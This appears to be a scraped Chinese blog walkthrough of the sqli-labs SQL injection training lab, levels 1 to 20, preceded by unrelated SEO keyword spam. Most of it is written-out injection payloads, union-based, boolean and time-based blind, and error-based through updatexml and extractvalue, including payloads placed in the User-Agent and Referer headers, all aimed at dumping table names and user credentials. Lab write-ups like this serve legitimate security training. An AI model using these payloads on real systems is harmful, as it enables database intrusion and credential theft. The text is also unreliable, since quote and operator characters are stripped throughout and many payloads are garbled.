普宁建设局网站,免费的网站开发平台,网站建设风险控制,网站备案类型有哪些前几个题目较为简单#xff0c;均尝试使用各种方法进行SQL注入
第一题
联合查询
1#xff09;思路#xff1a; 有回显值 1.判断有无注入点 2.猜解列名数量 3.判断回显点 4.利用注入点进行信息收集 爆用户权限#xff0c;爆库#xff0c;爆版本号 爆表#xff0c;爆列均尝试使用各种方法进行SQL注入
第一题
联合查询
1思路 有回显值 1.判断有无注入点 2.猜解列名数量 3.判断回显点 4.利用注入点进行信息收集 爆用户权限爆库爆版本号 爆表爆列爆账号密码 2解题过程 ?id1 and 11--和?id1 and 12--进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为字符型注入。 判断为单引号注入且有回显点 猜解列名数量为3 ?id1order by 3-- 判断回显点23 ?id-1union select 1,2,3-- 联合注入进行信息收集
爆库、版本号、权限 ?id-1 union select 1,database(),version()-- ?id-1 union select 1,2user()-- 爆表 ?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity-- 爆列 ?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers-- 爆账号密码 ?id-1 union select 1,2,(select group_concat(username,0x7e,password) from users)-- 第二题
解题思路与第一题相同 ?id1 and 11 和?id1 and 12进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为数字型注入。 联合查询
猜解列名数量3 ?id1 order by 4 判断回显点 ?id-1 union select 1,2,3 爆库、版本号、权限 ?id-1 union select 1,database(),version()-- ?id-1 union select 1,2user()-- 爆表、爆列 ?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity ?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers 爆账号密码 ?id-1 union select 1,2,(select group_concat(username,password))from users 第三题 ?id1and 11 and 11和?id1and 11 and 11进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为字符型注入。 根据报错信息判断为单引号带括号注入 联合查询
猜解列名 ?id1) order by 3-- 判断回显点 ?id-1) union select 1,2,3-- 爆库、版本号、权限 ?id-1) union select 1,database(),version()-- ?id-1) union select 1,2user()-- 爆表、爆列 ?id-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity ?id-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers 爆账号密码 ?id-1) union select 1,2,(select group_concat(username,password))from users 第四题
根据报错信息得到注入点是双引号带括号注入
联合查询
猜解列名 ?id1) order by 3-- 判断回显点 ?id-1) union select 1,2,3-- 爆库、版本号、权限 ?id-1) union select 1,database(),version()-- ?id-1) union select 1,2user()-- 爆表、爆列 ?id-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity ?id-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers 爆账号密码 ?id-1) union select 1,2,(select group_concat(username,password))from users 第五题
根据报错信息判断为单引号注入
没有发现回显点 方法布尔盲注太耗时不推荐使用
1猜解数据库名字所有ASCII码值范围0~127 ?id1 and length(database())8-- 页面正常显示则为true数据库名字长度为8
页面错误显示则为false数据库名字长度不为8 ?id1 and ascii(mid(database(),1,1))64-- 正常 ?id1 and ascii(mid(database(),1,1))100-- 正常 ?id1 and ascii(mid(database(),1,1))115-- 正常 ?id1 and ascii(mid(database(),2,1))101-- 正常 ?id1 and ascii(mid(database(),3,1))99-- 正常 如此就得到了
第一个字符的ASCII码为115解码出来为“s” 第二个字符的ASCII码为101解码出来为“e” 第二个字符的ASCII码为99解码出来为“c” 依次类推出数据库的名字为“security” 2猜解表名判断所有表名长度依次猜解所有表名
判断长度 ?id1 and length((select group_concat(table_name) from information_schema.tables where table_schemadatabase()))29-- 猜解表名 ?id1 and ascii(mid((select table_name from information_schema.tables where table_schemadatabase() limit 1,1),1,1))64 -- 正常 ?id1 and ascii(mid((select table_name from information_schema.tables where table_schemadatabase() limit 1,1),1,1))114-- 正常 说明第一个表第一个字符是r依次猜解直到找到users表
3猜解列名判断所有列名长度依次猜解users表中列名
判断长度 ?id1 and length((select group_concat(column_name) from information_schema.columns where table_nameusers))29-- 猜解列名 ?id1 and ascii(mid((select column_name from information_schema.columns where table_nameusers limit 1,1),1,1))64-- 4猜解账号密码 ?id1 and ascii(mid((select group_concat(username,password) from users),1,1))64-- 第六题
根据报错信息判断为双引号注入
页面没有回显信息采用布尔盲注与第五题方法完全一致 第七题
根据报错信息 ?id1 and 11 返回页面正常 ------对应查询SQLwhere id((1 and 11)); ?id1 and 12 返回页面报错 ------对应查询SQLwhere id((1 and 12)); 判断为字符型注入 ?id1 返回页面正常 ---------对应查询SQLwhere id((1)) ?id1-- 返回页面报错 ---------对应查询SQLwhere id((1--)) -----破坏SQL语句原有结构 ?id1)-- 返回页面报错 --------对应查询SQLwhere id((1)--)) ?id1))-- 返回页面正常 --------对应查询SQLwhere id((1))--)) 注入形式为?id1))
没有回显点尝试盲注,与第五题方法相同 第八题 ?id1 and 11 页面正常 ?id1 and 12 页面正常 ?id1 and 11 页面正常 ?id1 and 12 页面不正常无回显信息 判断为字符型注入 ?id1-- 页面正常无回显信息 SQL查询语句where id1-- 注入形式为?id1
没有回显点尝试盲注,与第五题方法相同 第九题 ?id1 and 11 页面正常 ?id1 and 12 页面正常 ?id1 and 11 页面正常 ?id1 and 12 页面正常 输入任何信息均显示相同页面尝试延时注入判断 ?id1 and if(11,sleep(5),1)-- 页面迅速显示 ?id1 and if(11,sleep(5),1)-- 页面过了5秒显示 判断为单引号注入
延时注入
判断数据库名字长度 ?id1 and if(length(database())8,sleep(3),1)-- 逐一猜解数据库名字用二分法 ascii码不断缩小范围 ?id1 and if(ascii(mid((select database()),1,1))115,sleep(3),1)-- 判断所有表名长度 ?id1 and if(length((select group_concat(table_name) from information_schema.tables where table_schemadatabase()))10,sleep(3),1)-- 逐一猜解表名 ?id1 and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schemadatabase()),1,1))64,sleep(3),1)-- 判断所有字段名的长度 ?id1and if(length((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers))20,sleep(3),1)-- 逐一猜解字段名 ?id1and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers),1,1))100,sleep(3),1)-- 判断字段内容长度 ?id1 and if(length((select group_concat(username,password) from users))109,sleep(3),1)-- 逐一检测内容 ?id1 and if(ascii(mid((select group_concat(username,password) from users),1,1))50,sleep(3),1)-- 第十题
和第九题情况相同无论输入什么回显内容均相同
进行延时注入判断 ?id1 and if(11,sleep(5),1)-- 页面迅速显示 ?id1 and if(11,sleep(5),1)-- 页面过了5秒显示 判断为双引号注入
剩余步骤与第九题相同 第十一题
方法一
poss提交
输入1显示登录失败 输入1 显示报错信息 根据提示得知SQL查询语句为 username参数 and password
and是与运算两个或多个条件同时满足才为真显示一条数据
or是或运算两个或多个条件满足其中一个即为真显示一条数据
此处只能用1 or 11# 不能用and因为不知道usernameusername1恒为假
并且只能用#用--无效
1 or 11# 页面正常显示 1 or 12# 页面报错 说明SQL语句正确
后续步骤使用联合注入
方法二
登录界面Burpsuite抓包尝试 输入1,提示报错、单引号注入 使用报错注入的方法extractvalue() 1order by 2 判断列数 1union select 1,extractvalue(1,concat(0x7e,database()))%23 爆版本号、数据库名、权限等 1union select 1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)))%23 爆表名 1union select 1,extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1)))%23 爆列名 1union select 1,extractvalue(1,concat(0x7e,(select username from users limit 0,1)))%23 1union select 1,extractvalue(1,concat(0x7e,(select password from users limit 0,1)))%23 爆账号密码 或者1union select username,password from users limit 1,1 %23 使用报错注入的方法updatexml() 1order by 2 判断列数 1union select 1,updatexml(1,concat(0x7e,database()),1)%23 爆版本号、数据库名、权限等 1union select 1,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)),1)%23 爆表名 1union select 1,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1)),1)%23 爆列名 1union select 1,updatexml(1,concat(0x7e,(select username from users limit 0,1)),1)%23 1union select 1,updatexml(1,concat(0x7e,(select password from users limit 0,1)),1)%23 爆账号密码 或者1union select username,password from users limit 1,1 %23 第十二题
输入1 和 1 页面没反应 输入1 页面出现报错信息提示是双引号带括号注入
猜解步骤与第十一题相同 第十三题
输入1 出现报错信息提示是单引号带括号注入
猜解步骤与第十一题相同 第十四题
输入1出现报错信息提示是双引号注入
猜解步骤与第十一题相同 第十五题
输入信息页面没有回显值
判断为盲注根据页面显示正确与否猜解数据库信息
当输入1or 11#,找到注入点 布尔盲注采用第五题解法
第十六题
与15题思路相同 第十七题
B站教学视频很详细 【sql注入之sqli-labs系列教程(less11-17)】sqli-labs_33_less17_哔哩哔哩_bilibili 我将SQL语句在页面中显示以便更深入学习。
寻找注入点
修改密码的一个页面。 输入正确的账号密码可以看到账号为admin密码修改admin——admin 密码换成123 使用hackbar插件
对username进行注入会发现输入的 被转义了寻找其他注入点 对password部分进行注入发现注入点 报错注入
关于报错注入的知识点第十一题 1order by 2 判断列数 1union select 1,updatexml(1,concat(0x7e,database()),1)%23 爆版本号、数据库名、权限等 1union select 1,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)),1)%23 爆表名 1union select 1,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1)),1)%23 爆列名 1union select 1,updatexml(1,concat(0x7e,(select username from users limit 0,1)),1)%23 1union select 1,updatexml(1,concat(0x7e,(select password from users limit 0,1)),1)%23 爆账号密码 或者1union select username,password from users limit 1,1 %23 第十八题
1.分析题目 学习博文包含http请求头的学习sqli-labs关卡18(基于http头部报错盲注)通关思路_sqli-labs18-CSDN博客 非常详细 我仍将SQL语句在页面中显示以便更深入学习。
输入正确的账号密码 页面回显ip信息
用户的ip信息与http请求头X-Forwarded-For有关可以尝试在http请求头注入 查看源码
这里username和password被过滤无法注入 User-Agent部分可以尝试注入 添加单引号会发现报错报错为缺少 , 判断原SQL语句为($uagent,$ip,$uname); 2.尝试注入
分析过后页面无回显点尝试报错注入
正常语句($uagent,$ip,$uname)
报错语句($uagent,$ip,$uname)多了个 )
注入语句SQL注入,1,1)#
1爆数据库 1and updatexml(1,concat(0x7e,(database())),1),1,1)# 2爆表 1and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1),0x7e),1),1,1)# 3爆列 1and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),0x7e),1),1,1)# 4爆账号密码 1and updatexml(1,concat(0x7e,(select passwordr from users limit 1,1),0x7e),1),1,1)# 第十九题
1.分析题目
输入正确的账号密码显示referer字段也是http请求头中的应该和第十八题思路一样 用Burpsuite抓包尝试在referer处加 报错 观察报错信息
判断正常语句应为$uagent,$ip
查看源码 报错语句$uagent,$ip
注入语句 SQL注入,1)#,$ip
2.尝试注入
1爆数据库 1and updatexml(1,concat(0x7e,database(),0x7e),1),1)# 2爆表 1and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1),0x7e),1),1)# 3爆列 1and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),0x7e),1),1)# 4爆账号密码 1and updatexml(1,concat(0x7e,(select passwordr from users limit 1,1),0x7e),1),1)# 第二十题
输入正确时页面显示Cookie值 用Burpsuite抓包进行报错注入
